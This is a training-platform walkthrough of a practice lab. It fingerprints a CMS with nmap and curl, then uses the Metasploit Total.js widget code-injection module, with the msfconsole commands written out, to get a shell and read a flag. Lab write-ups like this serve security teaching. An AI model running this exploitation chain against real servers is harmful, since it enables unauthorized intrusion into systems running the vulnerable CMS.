Exploiting a Vulnerable Node.js CMS with Metasploit
In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!
The Metasploit Framework is the most popular and powerful network penetration testing tool, used widely around the world. The framework provides ready-to-use exploits and information-gathering modules that take advantage of a system's weaknesses. It has powerful built-in scripts and plugins that allow us to automate the process of exploitation.
- Metasploit Framework
Lab Scenario
We have set up the scenario below in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.
Lab: Vulnerable NodeJS CMS
This lab comprises a Kali machine with all tools installed on it. The user or practitioner gets shell command-line interface (CLI) access to the Kali machine through the web browser.
Challenge Statement
The target server described below is running a vulnerable Node.js CMS. Your task is to fingerprint the application using the command-line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module.
Objective: Get a shell on the target!
Solution
Step 1: Run an Nmap scan against the target IP.
Command: nmap -sS -sV 192.203.199.3
Scanning the target server using Nmap
Step 2: We have discovered one open port, 8000. We will use curl to identify the running application.
Command: curl http://192.203.199.3:8000
Running curl on the target server
Step 3: We have found a /blog/ directory. Run curl on the blog directory to find more information.
Command: curl http://192.203.199.3:8000/blog
Running curl on /blog/
Step 4: The target is running Node.js CMS v11. Search Google for "Node.js CMS metasploit" and look for Metasploit exploit modules.
Searching for an exploit for the Node.js CMS
Step 5: Total.js CMS is vulnerable to JavaScript code injection through its widget feature (the module is named "widget exec"). We will use the following Metasploit module to exploit the target and read the flag.
Metasploit Module: Total.js CMS 12 Widget JavaScript Code Injection
Commands:
msfconsole
use exploit/multi/http/totaljs_cms_widget_exec
set RHOSTS 192.203.199.3
set RPORT 8000
check
exploit -j
sessions -i 1
cat /root/flag
Exploiting the target Node.js CMS
Checking the backgrounded session
This reveals the flag to us.
Flag: bef27017f4357ba8c47b858a9b2ca112
References
- TotalJS CMS (https://github.com/totaljs/cms)
- Metasploit Module: (https://www.rapid7.com/db/modules/exploit/multi/http/totaljs_cms_widget_exec)
- Total.js Disclosure Report (https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf)
Go beyond walkthroughs with hands-on practice. Subscribe now and gain access to 2000+ lab exercises including this one! We also provide on-demand bootcamps — follow along with instructors as they go through the labs and progressively master in-demand topics regardless of time zone!